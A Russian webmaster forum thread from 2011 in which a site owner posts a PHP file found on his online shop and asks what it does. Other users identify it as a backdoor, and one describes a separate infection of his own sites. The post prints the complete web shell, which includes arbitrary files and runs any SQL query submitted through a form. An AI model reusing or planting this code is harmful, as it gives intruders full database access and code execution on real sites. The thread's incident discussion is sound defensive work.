X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Нашел у себя зловредный код на сайте....., Жизнь мне 2 месяца портил....
ThePixel
ThePixel
Topic Starter сообщение 15.11.2011, 0:06; Ответить: ThePixel
Сообщение #1


Бывалый
****


Группа: User
Сообщений: 265
Регистрация: 4.3.2011
Из: Москва
Поблагодарили: 29 раз
Репутация:   5  


Прошу Вас рассмотреть данный код и дать понять что он делает:

<?php
session_start();
function s(){
$args = func_get_args();
if(count($args)==1){
if(isset($_SESSION[$args[0]])){
return $_SESSION[$args[0]];
}else{
return false;
}
}elseif(count($args)==2){
$_SESSION[$args[0]] = $args[1];
}
}
function r($arr,$print=true){
$str = '<tr><td>'.implode('</td><td>',$arr).'</td></tr>';
if($print){
print($str);
}else{
return $str;
}
}
if(!empty($_POST['connect'])){
if(file_exists($_POST['connect'])){
s('connect',$_POST['connect']);
}
}
if(s('connect') && file_exists(s('connect'))){
include(s('connect'));
print('included '.s('connect').'<br />');
}else{
print('nofile');
}
if(!empty($_POST['query'])){
mysql_query("SET NAMES utf8");
$sql = stripslashes($_POST['query']);
print($sql.'<br />');
$res = mysql_query($sql);
print(mysql_error());
$i = 0;
?>
<table border="1px" style="border-collapse: collapse; font-size: 0.7em">
<?php
while($row = mysql_fetch_array($res,MYSQL_ASSOC)){

if($i%100 == 0){
r(array_keys($row));
}
r($row);
$i++;
}
?>
</table>
<?php
}else{
$sql = '';
}
?>
<form action="<?=$_SERVER['REQUEST_URI']?>" method="post">
<input type="text" name="connect" /><br />
<textarea name="query" rows="25" cols="80" ><?=$sql?></textarea><br />
<input type="submit">
</form>


Жду комментариев, ох сколько же нервов он мне попортил.


--------------------
-1
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kronos
kronos
сообщение 15.11.2011, 0:21; Ответить: kronos
Сообщение #2


Белый веб-мастер
*******


Группа: Active User
Сообщений: 4703
Регистрация: 10.2.2009
Из: Харьков
Поблагодарили: 2629 раз
Репутация:   327  


на зловредный не похож


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ThePixel
ThePixel
Topic Starter сообщение 15.11.2011, 0:25; Ответить: ThePixel
Сообщение #3


Бывалый
****


Группа: User
Сообщений: 265
Регистрация: 4.3.2011
Из: Москва
Поблагодарили: 29 раз
Репутация:   5  


(kronos @ 15.11.2011, 0:21) *
на зловредный не похож

Может и нет но его функционал я не понимаю, у меня весь сайт танцует с БД вместе
http://www.saronit.ru/subcategory.php?id=332&bid=38 - вот пример в тексте.

и еще раскладка меняется по схожести букв с латиницы на русские...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Max_Q
Max_Q
сообщение 15.11.2011, 1:04; Ответить: Max_Q
Сообщение #4


Участник
***

Группа: User
Сообщений: 118
Регистрация: 13.11.2011
Поблагодарили: 46 раз
Репутация:   13  


Благодаря этому файлу можно подключать php файлы и выполнять произвольные запросы к базе данных. Так что это действительно "вредный код", благодаря которому можно получить доступ к сайту.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
bobgubko
bobgubko
сообщение 15.11.2011, 1:05; Ответить: bobgubko
Сообщение #5


Частый гость
**

Группа: User
Сообщений: 58
Регистрация: 20.4.2009
Из: Ukraine, Niko
Поблагодарили: 20 раз
Репутация:   18  


Не зловред? Та ладно. На shell похоже. На месте ТС я бы его удалил, если это не часть движка.


--------------------
php, js, html, css, python
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ThePixel
ThePixel
Topic Starter сообщение 15.11.2011, 1:32; Ответить: ThePixel
Сообщение #6


Бывалый
****


Группа: User
Сообщений: 265
Регистрация: 4.3.2011
Из: Москва
Поблагодарили: 29 раз
Репутация:   5  


Max_Q, Вот это оно и есть, у меня интернет магазин просто вешался, когда меняется наименование товара или еще что)))

Сообщение отредактировал bum - 2.4.2012, 14:49
Причина редактирования: -overquotting


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
FRUTALITY
FRUTALITY
сообщение 15.11.2011, 14:45; Ответить: FRUTALITY
Сообщение #7


Участник
***

Группа: User
Сообщений: 144
Регистрация: 7.9.2010
Поблагодарили: 39 раз
Репутация:   3  


В каком/каких файлах данный код нашелся?

Дело в том, что сегодня я тоже обнаружил вредоносный код на своих сайтах. Все, что нашел - это появившаяся строка в каждом php файле; файл вида tmp_32795234523.php в корне каждого сайта; 6 файлов такого же вида в корне FTP; а также код в htaccess каждого сайта.

Заподозрил что-то неладное, когда на всех сайтах начался спад посещаемости; случайно увидел, как браузер при открытии моего сайта грузит какую-то информацию с домена turnitupnow.net - проверил сайты, нашел вредоносный код. Но, боюсь, что не весь.

Поэтому повторю вопрос, в каком файле вы нашли этот код? Тоже гляну у себя.


--------------------
Magic 8 ball как в фильме "Трасса 60". Онлайн.
Мой скромный бложе.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) SimplePay: Прием платежей на сайте для юридических и физических лиц
2 kuprum 345 Вчера, 15:50
автор: kuprum
Горячая тема (нет новых ответов) Рекомендую: размещение статьи на сайте, ТИЦ 325, PR 6, траст XT 8
44 rumblade 10652 Вчера, 15:45
автор: rumblade
Открытая тема (нет новых ответов) 17 вещей на вашем сайте, которые ненавидят
Один из постулатов маркетинга — не раздражать людей
25 PostBrigada 3610 12.12.2017, 21:44
автор: alexandrrr
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПрибыль с видео на сайте и в соц сетях
Как получить доп доход с нативного контента
14 maxim_krasovskiy 2825 12.12.2017, 12:05
автор: maxim_krasovskiy
Открытая тема (нет новых ответов) Естественные ссылки в деталях. Что из себя представляют, как добывать
seoandme.ru - SEO-блог Анны Ященко
0 AnnaYa 327 12.12.2017, 10:56
автор: AnnaYa


 



RSS Текстовая версия Сейчас: 15.12.2017, 10:56
Дизайн